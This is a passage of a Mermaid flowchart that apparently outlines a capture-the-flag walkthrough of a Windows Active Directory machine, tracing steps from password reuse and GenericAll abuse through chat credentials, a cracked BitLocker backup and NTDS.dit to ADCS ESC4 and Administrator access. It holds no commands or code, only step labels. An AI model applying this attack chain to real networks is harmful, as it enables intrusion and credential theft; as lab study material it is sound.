    F -->|Check for password reuse| G(Access as d.anderson)
    G -->|Add GenericAll to group and members| H(Access as e.rodriguez)
    H -->|Reset Password| I(Access as m.harris)
    I -->|Remote Management User| J(Shell as m.harris)
    end
    subgraph "Privilege Escalation"
    J & Z -->|Access to Chat Application| K(Credentials for chat as m.harris)
    K -->|Shared Binary with hardcoded creds| L(Access as winrm_svc)
    L -->|API Key & Local artefacts| M(Chat History)
    M -->|Shared Password| N(Chat access as o.martinez)
    N -->|Calendar entry running a file| O(Shell as o.martinez)
    O -->|Shared file: packet capture| P(Creds for o.martinez) & Q(Bitlocker-backup.7z)
    Q -->|Crack Password| R(Bitlocker Recovery Key)
    P -->|Access to RDP| P1(Interactive Session)
    P1 & R -->|Access to Bitlocker Drive| S(NTDS.dit backup)
    S -->|Password in Description| T(Access as lan_managment)
    T -->|ESC4| U(Access as Administrator)
    end
```